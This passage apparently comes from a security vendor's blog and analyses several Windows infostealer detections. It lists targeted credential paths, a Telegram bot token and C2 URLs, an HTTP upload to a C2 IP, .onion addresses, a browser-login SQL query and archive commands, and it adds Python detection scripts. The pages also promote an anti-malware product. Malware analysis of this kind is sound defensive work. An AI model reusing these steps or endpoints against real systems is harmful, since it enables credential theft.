%USERPROFILE%\AppData\Local\Temp\__PSScriptPolicyTest_dhhkkyeh.5dh.ps1
%USERPROFILE%\AppData\Local\Temp\__PSScriptPolicyTest_ypq04irl.mrv.psm1
%USERPROFILE%\AppData\Local\Temp\tmp8901.tmp
%USERPROFILE%\AppData\Roaming\oobbtR.exe
%USERPROFILE%\AppData\Local\Temp\tmpF5CB.tmp

Next, the threat performs its main task: collecting data. It checks installed browsers, email clients and other places on the system that may contain login credentials, specifically the following locations:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Microsoft\Credentials\
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
C:\Users\user\AppData\Roaming\Comodo\IceDragon\profiles.ini
C:\Users\user\AppData\Roaming\Flock\Browser\profiles.ini
C:\Users\user\AppData\Roaming\K-Meleon\profiles.ini
C:\Users\user\AppData\Roaming\Microsoft\Credentials\
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\user\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
C:\Users\user\AppData\Roaming\Postbox\profiles.ini
C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
C:\Users\user\AppData\Roaming\Waterfox\profiles.ini

The malware compresses all collected data into an archive and saves it in a temporary folder. This makes the transfer much harder to notice, as a single file simply blends into the rest of the network traffic. To further avoid security software flagging an abnormal transfer, the malware also uses encrypted connections when communicating with the command server.

Data Exfiltration

The last step in the malware cycle is sending the collected data to the attacker’s command and control (C2) server. Before that, the malware checks the system’s external IP address through the api.ipify.org service. This is probably needed for the system fingerprint, the set of data that distinguishes one infected system from another. The malware uses Telegram as a command server, specifically calling a part of the Telegram API to send messages via URLs.

https://api.telegram.org/bot5693068931:AAGSQSNIWDJM1FzeZVNHS020I9wVBrQdkRM/sendMessage

On the hacker’s side, this looks like a conversation with a bot that regularly sends back the logs from victim PCs. Using Telegram as a C2 server is now a rather popular practice, though the exact model of how this works may change after the recent events around the messenger.
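The chain described in this analysis (single-instance mutexes, the Defender status check, the scheduled task, staging in AppData, credential-store reads and the Telegram upload) is exactly what a sandbox report or EDR timeline shows as plain mutex, registry, file and URL events. The following Python script is an added example, not code from the original post: it classifies such event lines into the stages described in the collection and exfiltration sections above, using the paths and URL shapes quoted in this post as indicators. The sample events are constructed to mirror the listing; the Telegram rule matches the bot-token shape generically (a placeholder token is used), so the rule does not depend on a single token.

```python
import re
from collections import Counter

# One indicator per stage of the chain described in this post. Patterns are
# built from the paths and URLs quoted above; the Telegram rule matches the
# bot-token shape generically so it does not depend on a single token.
RULES = [
    ("single-instance mutex",
     re.compile(r"\\BaseNamedObjects\\(Global|Local)\\"
                r"(RasPbFile|SyncRootManager|ZonesCacheCounterMutex|ZonesLockedCacheCounterMutex)$", re.I)),
    ("security status check",
     re.compile(r"Internet Explorer\\Security|Windows Defender\\Platform\\.*\\MsMpLics\.dll$", re.I)),
    ("scheduled task persistence",
     re.compile(r"\\System32\\Tasks\\", re.I)),
    ("staging in user profile",
     re.compile(r"\\AppData\\(Roaming|Local\\Temp)\\[^\\]+\.(exe|tmp|ps1|psm1)$", re.I)),
    ("browser credential store",
     re.compile(r"\\User Data\\[^\\]+\\Login Data(-journal|-wal)?$|\\profiles\.ini$", re.I)),
    ("Windows credential store",
     re.compile(r"\\AppData\\(Local|Roaming)\\Microsoft\\Credentials\\?$", re.I)),
    ("external IP lookup",
     re.compile(r"\bapi\.ipify\.org\b", re.I)),
    ("Telegram bot C2",
     re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/(sendMessage|sendDocument)", re.I)),
]


def classify_event(line):
    """Return the stage labels whose indicator matches one event line (may be empty)."""
    line = line.strip()
    return [stage for stage, rx in RULES if rx.search(line)]


def triage(events):
    """Classify each event and reach a verdict for the whole batch.

    Returns (per_event, stage_counts, verdict). The verdict is only
    'infostealer chain' when credential-store access is seen together with
    the exfiltration channel; a lone profiles.ini read, which backup tools
    also perform, stays at 'suspicious'."""
    per_event = [(event, classify_event(event)) for event in events]
    counts = Counter(stage for _, stages in per_event for stage in stages)
    credential_hits = counts["browser credential store"] + counts["Windows credential store"]
    exfil_hits = counts["Telegram bot C2"]
    if credential_hits and exfil_hits:
        verdict = "infostealer chain"
    elif credential_hits or exfil_hits or counts["scheduled task persistence"]:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return per_event, counts, verdict


# Constructed sample events that mirror the listing in this post. The Telegram
# token is a placeholder, not the one quoted above. The last line is benign filler.
SAMPLE_EVENTS = [
    r"\Sessions\1\BaseNamedObjects\Global\RasPbFile",
    r"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex",
    r"HKCU\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck",
    r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2102.4-0\X86\MsMpLics.dll",
    r"C:\Windows\System32\Tasks\Updates\oobbtR",
    r"%USERPROFILE%\AppData\Roaming\oobbtR.exe",
    r"%USERPROFILE%\AppData\Local\Temp\tmp8901.tmp",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Credentials\\",  # not raw: trailing backslash
    "https://api.ipify.org/",
    "https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/sendMessage",
    r"C:\Windows\System32\notepad.exe",
]


if __name__ == "__main__":
    per_event, counts, verdict = triage(SAMPLE_EVENTS)
    for event, stages in per_event:
        print(f"{', '.join(stages) or '-':40} {event}")
    print("stages seen:", dict(counts))
    print("verdict:", verdict)
```

The verdict deliberately requires both a credential-store read and the exfiltration channel before it names an infostealer chain: browser backup utilities read profiles.ini and Login Data too, and a lone mutex name proves nothing, so a single stage only raises the batch to "suspicious".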

How To Remove Trojan:Win32/Stealer!MTB?

To get rid of the Stealer, the best option is to perform an anti-malware scan. GridinSoft Anti-Malware will be an optimal solution for that task: its multi-component detection system will swiftly delete any malicious elements, regardless of their origin. Below you can see the detailed guide on how to perform the scan and remove the threats afterwards.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:Win32/Commandrob.A!ml Threat Analysis
https://gridinsoft.com/blogs/trojan-win32-commandrob-aml-remove/
Wed, 09 Oct 2024 09:01:46 +0000

The Trojan:Win32/Commandrob.A!ml detection may sometimes flag legitimate programs. Here is how to understand whether there is any real danger.

The post Trojan:Win32/Commandrob.A!ml Threat Analysis appeared first on Gridinsoft Blog.
Trojan:Win32/Commandrob.A!ml is a heuristic detection associated with suspicious network activity. It may refer to a wide range of malicious programs, or be a false positive detection. In this post, I will explain what it means and how you can check the system for possible viruses.

Trojan:Win32/Commandrob.A!ml Overview

Trojan:Win32/Commandrob.A!ml is an AI-based detection of Microsoft Defender. This detection is triggered by behaviors typical of spyware or backdoors that access network resources. Since the detection relies on machine learning (indicated by the “!ml” suffix), it may be a false positive. This happens because the detection focuses on program behavior and network communication patterns instead of traditional signature-based analysis.

This creates significant uncertainty for users who see this detection. Legitimate programs can trigger it, but that does not guarantee that what one sees is a false positive. There are quite a lot of details to go through to understand whether this detection poses any danger to your system, so let’s have a more detailed look at what exactly is detected.

Technical Analysis

As mentioned earlier, Trojan:Win32/Commandrob.A!ml is a behavior-based heuristic detection. In particular, users report it flagging a PowerShell script used for specific network operations. The calls used in such scripts can indeed be attributed to backdoors or spyware: they typically query the system’s IP address to determine its location. Malware needs this information to avoid running in certain countries and to communicate with command servers. In particular, the following command is almost guaranteed to trigger the detection:

(Invoke-WebRequest -uri http://ipinfo.io/ip -UseBasicParsing).Content

This request queries the external IP address of the host system by invoking the “ipinfo.io” service, which returns the IP address in plaintext. The -UseBasicParsing option streamlines web response parsing, making it faster and less reliant on Internet Explorer’s full HTML parsing, which older PowerShell versions may use by default. The “Content” property retrieves the HTTP response body, which in this case contains the external IP address of the system.

Such behavior, as I’ve mentioned, is pretty typical for spyware and backdoors, though it can be found in other malware types as well. Malware uses this information to create a system fingerprint, and sometimes stops further execution if the detected location is on its ban list. However, if Trojan:Win32/Commandrob.A!ml is a real detection, you won’t see the commands and arguments laid out like that, in plain text, as that would be extremely easy to detect. Malicious programs employ encoding to avoid this, making the command unintelligible.

The effects of Trojan:Win32/Commandrob.A!ml (if it is real malware) are less than pleasant. Regardless of the exact type, the virus will likely gather all the login credentials present in the system and provide remote access for the hacker. You may not notice that instantly, but in about a week the hackers will make use of the leaked passwords and hijack the corresponding accounts. Aside from the dirty work with passwords, it will likely disable the system’s security measures, making it vulnerable to further malware attacks.

Is Trojan:Win32/Commandrob.A!ml False Positive?

There is a high probability of Trojan:Win32/Commandrob.A!ml being a false positive detection. Since the detection is triggered by network communications via PowerShell, it catches legitimate programs that use similar commands for routine tasks. Examples include software updates or network status checks, a feature present in a lot of modern software.

One specific example comes from the Peugeot community forum, where a user reported this detection flagging new firmware for the on-board computer of a Peugeot car. As they had sourced the firmware from the official website, the chances of it being a real detection are, obviously, extremely low. All that users can do in such situations is add the corresponding file to the Ignore List, so Microsoft Defender won’t touch it.

Overall, if you see the Trojan:Win32/Commandrob.A!ml detection popping up for a safe and legitimate program, it is OK to just ignore and whitelist it. Microsoft typically updates its detection databases every day, so a fixed version will likely appear in a day or two. At the same time, it may be difficult to make a decision, especially when Defender flags a PowerShell instance or a random file rather than a specific program.

How to Remove Trojan:Win32/Commandrob.A!ml?

To scan the system and remove the potential Trojan:Win32/Commandrob.A!ml malware, I recommend using GridinSoft Anti-Malware. It will give you a second opinion on whether there is anything malicious going on in your system, and remove the threats in just a few clicks. A Full scan will fit the need, scanning even the most remote parts of the system. The program will also help with stopping threats like Trojan:Win32/Commandrob.A!ml in the future.


Trojan:Win64/Zusy.CZ!MTB
https://gridinsoft.com/blogs/trojan-win64-zusy-czmtb-virus-remove/
Sun, 06 Oct 2024 21:53:30 +0000

Trojan:Win64/Zusy.CZ!MTB detection may appear out of the blue. Here is what it means and how to remove it.

The post Trojan:Win64/Zusy.CZ!MTB appeared first on Gridinsoft Blog.
Trojan:Win64/Zusy.CZ!MTB is a detection of Microsoft Defender that can flag several different types of malware. Being a heuristic detection, it can as well be a false positive, with no real threat to the system. Let me explain in detail what this threat is about, and how to remove it.

Trojan:Win64/Zusy.CZ!MTB Overview

Trojan:Win64/Zusy.CZ!MTB is a Microsoft Defender heuristic detection categorized as an info stealer or spyware. Although the detection name includes “Zusy”, it is unlikely that this threat is directly related to Zusy, aka Tinba (Tiny Banker) banking trojan. Instead, the name reflects similarities in behavior rather than a link to that specific threat.

Win64/Zusy.CZ!MTB detection (screenshot)

Typically, malware detected under this name steals sensitive data from the system, messengers and browsers. In addition, some samples of Zusy.CZ!MTB can act as a malware dropper. It can dynamically load the modules it needs, resolving essential Windows functions (e.g., API functions) at execution time rather than binding them statically at compile time. In simple words, it can circumvent security mechanisms and run malware without any obstacles.

Technical Analysis

Let’s take a closer look at how Trojan:Win64/Zusy.CZ!MTB behaves on the system. The first action the malware takes is to check for any existing copies running on the system. To achieve this, it searches for and reads several mutexes. If no other copies are found, the malware creates the following mutexes:

Global\SyncRootManager
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
cversions.3.m

Further, it creates a selection of processes through svchost, a legitimate Windows system process. That way, the malware gains high privileges and also manages to stay below the radar of security systems.

%windir%\System32\svchost.exe -k WerSvcGroup
%CONHOST% "745317126-1829192619145923398189172921-1227097410-10282899566139682-372746664
%CONHOST% "-1075281491-1761242975-14846433691718005387762123978-115817497120033444571637710908

After loading what appear to be some of its modules, Trojan:Win64/Zusy.CZ!MTB proceeds to check whether the system is a virtualized environment of any sort. That is a rather typical check for almost any malware sample these days, and it will cease further execution should the system show any signs of artificiality.

HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe.Config
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

Preparation continues with checks for security software. With a call to services.exe, the virus enumerates active services, seeking ones specific to antivirus software. It will alter its behavior if one or several matches are present. Further checks review the configuration of Microsoft Defender.

C:\Windows\system32\services.exe
C:\Windows\system32\SecurityHealthService.exe
C:\Program Files\Windows Defender\MpClient.dll
C:\Program Files\Windows Defender\MpOAV.dll
C:\Program Files\Windows Defender\MsMpLics.dll

Gathering System Information and Establishing Persistence

The next step involves creating a system fingerprint and collecting basic information. This is not yet about stealing personal information: the malware needs just basic stats of the system so the command server can distinguish it from others. To do this, the malware launches several other processes:

wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
C:\Windows\System32\netsh.exe netsh wlan show profiles

While these are legitimate Windows tools, the malware employs them to forcibly update system information.

To gain additional persistence, the malware edits a selection of registry keys, mainly those responsible for networking and program properties. Specifically, it installs a proxy server to control traffic on the target system and sets the ProxyEnable value to 1 (enabled), indicating its ability to control the Internet connection. The reason for the edits to the InstalledWin32AppsRevision key is not clear, but it may serve to track changes in program configurations.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\InstalledWin32AppsRevision
HKEY_USERS\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_USERS\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
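The proxy edits above are easy to audit after the fact, because a `reg export` of the user hive lists ProxyEnable and ProxyServer side by side. The Python below is an added example, not code from the original post: it parses a constructed .reg export that uses the Internet Settings key and the SID quoted above, and reports every user hive whose WinINet proxy is switched on, singling out a proxy that points back at the local machine. The proxy address in the sample is made up, and the parser handles only the REG_DWORD and REG_SZ value forms the check needs.

```python
import re

# Constructed .reg export modelled on the keys quoted in this post. The first
# SID is the one from the post; the second hive and the proxy address are made up.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="127.0.0.1:8080"
"ProxyOverride"="<local>"

[HKEY_USERS\S-1-5-21-575823232-3065301323-1442773979-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000000
'''

KEY_LINE = re.compile(r"^\[(.+)\]$")
# "Name"=dword:XXXXXXXX  or  "Name"="string"; other types (hex:, expand strings) are skipped.
VALUE_LINE = re.compile(r'^"([^"]+)"=(dword:([0-9a-fA-F]{8})|"(.*)")$')
INTERNET_SETTINGS = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings$", re.I)


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}}.

    DWORDs become ints, strings stay as written (escape sequences untouched)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            name, _, dword, string = m.groups()
            keys[current][name] = int(dword, 16) if dword is not None else string
    return keys


def audit_proxy(text):
    """Report every Internet Settings key with ProxyEnable set to 1.

    Returns a list of (key_path, proxy_server, note). The 'host:port' form of
    ProxyServer is assumed; the per-protocol 'http=...;https=...' form is
    reported as-is for manual review."""
    findings = []
    for key, values in parse_reg(text).items():
        if not INTERNET_SETTINGS.search(key):
            continue
        if values.get("ProxyEnable", 0) != 1:
            continue
        server = values.get("ProxyServer", "")
        host = server.rsplit(":", 1)[0] if server and "=" not in server else ""
        if not server:
            note = "proxy enabled but no server set"
        elif host == "localhost" or host.startswith("127."):
            note = "proxy points at the local host: a local interceptor is likely"
        elif "=" in server:
            note = "per-protocol proxy list; review each entry"
        else:
            note = "proxy enabled; confirm the server is one you deployed"
        findings.append((key, server, note))
    return findings


if __name__ == "__main__":
    for key, server, note in audit_proxy(SAMPLE_REG):
        print(f"{key}\n  ProxyServer={server!r}: {note}")
```

Run against a real export, the same function also surfaces hives where ProxyEnable is 1 with an empty ProxyServer, which is the leftover state after a tool removes its proxy but not the flag, and which still breaks connectivity for that user.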

C2 Connection

After gathering the system fingerprint, the malware contacts the command and control server at 185.215.113.32/yandex/index.php, transmits the collected information, and awaits further instructions. For the majority of samples, those instructions specify which files and data the virus should search for.

Collecting sensitive data

Upon receiving the configuration file, Trojan:Win64/Zusy.CZ!MTB starts its main course of action: collecting sensitive data. To achieve this, it abuses rundll32.exe, a legitimate process, to run the following command from a temporary folder:

"C:\Windows\System32\rundll32.exe" C:\Users\A4148~1.MON\AppData\Local\Temp\d6feff0c199f425b6ae4ebf34630939d.exe.dll,DllMain
kernel32.CreateSemaphoreW

Following this, it goes through folders that contain browser data, particularly going for anything that can carry information about user accounts, login credentials and so on. Alongside browser data, the malware also collects user information from several Windows folders.

C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\.purple\accounts.xml
C:\Program Files\Google\Chrome\Application\chrome.VisualElementsManifest.xml
C:\Program Files\Internet Explorer\.purple\accounts.xml
C:\Program Files\Mozilla Firefox\.purple\accounts.xml
C:\Program Files\Mozilla Firefox\TorBrowser\Data\Browser\profile.default
C:\Program Files\Mozilla Thunderbird\Thunderbird.exe
C:\Users\\AppData\Local\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default\logins.json
C:\Users\\AppData\Local\CentBrowser\User Data\Default\Login Data
C:\Users\\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\\AppData\Local\Chromium\User Data\Default\Login Data-journal
C:\Users\\AppData\Local\Chromium\User Data\Default\Login Data-wal
C:\Users\\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\\AppData\Roaming\.purple\accounts.xml
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\.purple\accounts.xml

Data Exfiltration

Once the malware completes the data collection, it compresses the information into an archive saved in a temporary folder, using the corresponding PowerShell command:

powershell -Command Compress-Archive -Path '%TEMP%\_Files_\' -DestinationPath '%TEMP%\758232323065_Desktop.zip' -CompressionLevel Optimal
rundll32.exe %SAMPLEPATH%,Save

The final step involves uploading the archive to the attacker’s server. As the malware uses a plain HTTP connection for this, it would have been possible to intercept the upload and discover that a malware attack is going on. However, the previous step of compressing the files into an archive makes that a much more complicated endeavor.

POST http://185.215.113.32/yandex/index.php 200
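Compressing the stolen files changes what leaves the host but not how recognisable it is: a ZIP produced by Compress-Archive begins with the local-file-header signature PK\x03\x04, and a plain HTTP POST carries those bytes in the clear unless the archive is wrapped in a further layer (multipart form data, Base64 or encryption). The Python below is an added example, not code from the original post, of the check a proxy or IDS rule could apply to the upload step shown above: it builds a ZIP in memory to stand in for the stolen-data archive, then scores each request on whether the destination is a bare IP address, whether the path is a PHP script, and whether the body starts with a ZIP signature. The request records are constructed; the C2 address and path are the ones quoted in this post, and the archive contents are placeholders.

```python
import io
import ipaddress
import re
import zipfile
from urllib.parse import urlsplit

# Every non-empty ZIP starts with a local file header; an empty one starts
# with the end-of-central-directory record. Compress-Archive writes standard ZIPs.
ZIP_LOCAL_HEADER = b"PK\x03\x04"
ZIP_EMPTY = b"PK\x05\x06"


def build_archive(files):
    """Build an in-memory ZIP from {name: bytes}; stands in for the stolen-data archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def is_bare_ip(host):
    """True when the destination is an IP literal instead of a hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_post(method, url, body):
    """Collect archive-exfiltration traits of one HTTP request.

    Returns (score, reasons). Each trait is weak on its own; a bare-IP
    destination together with a ZIP body is what the upload step above produces."""
    reasons = []
    if method.upper() != "POST":
        return 0, reasons
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.scheme.lower() == "http":
        reasons.append("cleartext HTTP")
    if is_bare_ip(host):
        reasons.append("destination is a bare IP address")
    if re.search(r"\.php$", parts.path, re.I):
        reasons.append("PHP endpoint")
    if body.startswith(ZIP_LOCAL_HEADER):
        reasons.append("body is a ZIP archive")
    elif body.startswith(ZIP_EMPTY):
        reasons.append("body is an empty ZIP archive")
    return len(reasons), reasons


def verdict(score, reasons):
    """Turn the trait list into a verdict; the two strong traits together decide."""
    if "body is a ZIP archive" in reasons and "destination is a bare IP address" in reasons:
        return "likely archive exfiltration"
    if score >= 2:
        return "suspicious"
    return "benign"


# Constructed traffic: the first request mirrors the post's final step, with the
# C2 address and path quoted there; the archive contents are placeholders.
STOLEN_ARCHIVE = build_archive({
    "Login Data": b"SQLite format 3\x00" + b"\x00" * 48,
    "profiles.ini": b"[Profile0]\nPath=Profiles/placeholder.default\n",
})
SAMPLE_REQUESTS = [
    ("POST", "http://185.215.113.32/yandex/index.php", STOLEN_ARCHIVE),
    ("POST", "https://updates.example.com/api/telemetry", b'{"version": "1.0"}'),
    ("GET", "http://185.215.113.32/yandex/index.php", b""),
]


def triage(requests=SAMPLE_REQUESTS):
    """Return [(url, verdict, reasons)] for each request."""
    out = []
    for method, url, body in requests:
        score, reasons = score_post(method, url, body)
        out.append((url, verdict(score, reasons), reasons))
    return out


if __name__ == "__main__":
    for url, v, reasons in triage():
        print(f"{v:28} {url}  {'; '.join(reasons) or '-'}")
```

Only the first request is rated as likely exfiltration; the JSON telemetry POST collects no traits, and the GET to the same C2 path is the beacon described earlier, which carries nothing to exfiltrate and so falls to a different rule.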

Can Trojan:Win64/Zusy.CZ!MTB be a false positive?

Yes, Trojan:Win64/Zusy.CZ!MTB can indeed be a false positive. For instance, some Reddit users reported that Defender unexpectedly detected the Zusy trojan upon starting their PCs, particularly in some harmless log files. At times, this detection was linked to outdated Chromium files. It is also possible to see this detection flagging home-made programs, especially if they have certain networking capabilities.

Given that this is a heuristic detection, such occurrences are not surprising. Updating Microsoft Defender’s detection databases should be enough in that case; when Chromium is detected, a browser update should fix the issue. The rest of the cases, well, they can continue for quite some time unless you report the false positive to Microsoft. But it is worth noting that figuring out on your own whether the detection is false is not always a good idea.

How To Remove Trojan:Win64/Zusy.CZ!MTB?

If you encounter Trojan:Win64/Zusy.CZ!MTB and suspect it is not a false positive, it is advisable to conduct a full system scan. For this, it is best to use advanced anti-malware software such as GridinSoft Anti-Malware. Just follow the scan-and-removal steps described for Trojan:Win32/Stealer!MTB above to clean Trojan:Win64/Zusy.CZ!MTB and other potential threats from your system.

Trojan:Win64/Reflo.HNS!MTB
https://gridinsoft.com/blogs/trojan-win64-reflo-hns-mtb/
Tue, 03 Sep 2024 21:42:03 +0000

The post Trojan:Win64/Reflo.HNS!MTB appeared first on Gridinsoft Blog.
Win64/Reflo.HNS!MTB is a detection of a malware sample that aims at stealing confidential information. It usually spreads through game mods and works as quietly as possible. The virus may belong to any malware family, as this is a behavioral detection of a specific action it performs in the system.

Win64/Reflo.HNS!MTB Overview

Trojan:Win64/Reflo.HNS!MTB is a heuristic detection used by Microsoft Defender to detect a specific type of malware. This malware is a type of spyware and can actively collect sensitive information, such as user credentials, from the victim’s system. Heuristic detection is used when malware has certain characteristics and behavioral patterns that match known threats, but it may not have a matching signature in the antivirus database.

Win64/Reflo.HNS!MTB detection popup screenshot

After execution, the Reflo Trojan starts its malicious activity immediately, with the primary goal of stealing confidential information. This can end with your social media accounts sending spam messages and your bank accounts being drained. This type of malware is designed to operate stealthily, so its presence is usually difficult to detect. In most cases, the victim only discovers it when significant damage has already been done, such as the unauthorized access to online accounts mentioned above.

As with most similar threats, Trojan:Win64/Reflo.HNS!MTB is often spread via pirated software. Repackers, modders, and websites that distribute pirated games, cracked programs, or mods may add it as a hidden addition to their repacks. It can also spread through email attachments, malicious links, or accidental downloads on compromised websites. However, the main source of this threat is questionable game mods.

Technical Analysis

Now let’s see how this malware behaves on a compromised system. As mentioned earlier, this virus is mainly distributed via game mods, so users tend to treat any detection as a false positive by default. Although the user won’t notice anything visually, clicking “allow” triggers certain processes in the system.

The process begins with the following command:

"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && start /wait ^"^" ^"C:\Users\\AppData\Local\Temp\Appname/Setup.bat^"
C:\Windows\system32\cmd.exe /K "C:\Users\\AppData\Local\Temp\Appname/Setup.bat
python Setup.py

Next, the malware checks for the presence of a sandbox or virtual environment and fingerprints the system. To do this, it checks the following registry keys:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ActiveComputerName

This is a standard anti-analysis step: it keeps the threat from running in a virtual environment where it could be examined. In addition, Trojan:Win64/Reflo.HNS!MTB uses some tricks to hinder dynamic analysis.

Payload

The following commands are used by the Reflo Trojan to drop and unpack the payload:

"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\RedTiger-Tools-main.zip"
7620 - C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\cjov35ys.mq0" "C:\Users\user\Desktop\Appname.zip"
7660 - C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

The malware drops many files into the Windows temporary directory C:\Users\user\AppData\Local\Temp\, including many “.py” files that are necessary for the malware to work.

Credential Access

The next step is to collect confidential information. This is done by creating a DirectInput object that enables the malware to read keystrokes. In this way, attackers can intercept usernames and passwords that the victim enters on their device. Once the user authorizes the execution of this threat, it can run in the background for an extended period. The malware is extremely stealthy, and the name of the executable can be random. Therefore, the user is unlikely to realize why they can no longer log into their account.

Besides keylogging, the stealer also collects confidential data already stored on the system. Among other things, it can collect cookies, saved passwords, and credit card information from autofill forms in popular browsers. Although recent browser versions store this information encrypted, that does not protect it completely. Typically, the query against the browser’s login database looks like this:

SELECT action_url, username_value, password_value FROM logins

Almost always, infostealer malware like Reflo.HNS!MTB targets the most popular web browsers. Chrome, Chromium, Opera, Firefox and some popular alternatives to the mainstream applications are on the target list. Still, using a little-known browser will not necessarily protect you: malware operators can easily adjust the list of applications their malware extracts credentials from.

C2 Connection

The malware communicates with multiple addresses on the internet, but certain addresses are of particular interest. Specifically, it attempts to connect to .onion addresses, which are associated with the Darknet. Our instance is trying to connect to:

3bp7szl6ehbrnitmbyxzvcm3ieu7ba2kys64oecf4g2b65mcgbafzgqd.onion
55niksbd22qqaedkw36qw4cpofmbxdtbwonxam7ov2ga62zqbhgty3yd.onion
7mejofwihleuugda5kfnr7tupvfbaqntjqnfxc4hwmozlcmj2cey3hqd.onion
ajlu6mrc7lwulwakojrgvvtarotvkvxqosb4psxljgobjhureve4kdqd.onion

These are just a few of the addresses. In addition to darknet sites, the malware tries to connect to URLs related to Discord, Telegram, Mastodon or similar social networks. That tactic lets the fraudsters mask the real command servers, as the corresponding user profiles contain nothing but a link to the “main” C2.

How To Remove Trojan:Win64/Reflo.HNS!MTB?

To remove Trojan:Win64/Reflo.HNS!MTB, it’s essential to use an advanced anti-malware solution. I recommend GridinSoft Anti-Malware, as it can offer permanent protection against most threats in addition to cleaning. The first step is to scan your system and remove all detected threats. To do this, follow the instructions below:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. You can adjust the action the program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also view extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

After removing the threats, be sure to change your account passwords and terminate any suspicious sessions. This step is crucial to prevent attackers from regaining access to compromised accounts.

Trojan:Win32/Bearfoos.B!ml https://gridinsoft.com/blogs/trojan-win32-bearfoos-bml/ Sat, 13 Jul 2024 12:31:59 +0000

The post Trojan:Win32/Bearfoos.B!ml appeared first on Gridinsoft Blog.

Trojan:Win32/Bearfoos.B!ml is a detection of Microsoft Defender associated with data stealing malware. It may flag this malware due to the specific behavior patterns, assigning that name even to malicious programs of well-known families. As the Defender uses machine learning for this detection, it can sometimes be a false positive.

Trojan:Win32/Bearfoos.B!ml Overview

Trojan:Win32/Bearfoos.B!ml is a detection by Microsoft Defender’s AI-based system for infostealer malware and spyware. Typically, the malware this detection flags belongs to a broader family, but it may also be a small-batch virus. The reason for the detection is a specific behavior pattern the AI system has spotted, which means it is not entirely clear what exactly triggered it. Bearfoos embeds itself deeply into the system, often unnoticed by the user. It targets cookies, password databases, cryptocurrency wallets, and other sensitive information stored on the infected system.

Trojan:Win32/Bearfoos.B!ml detection

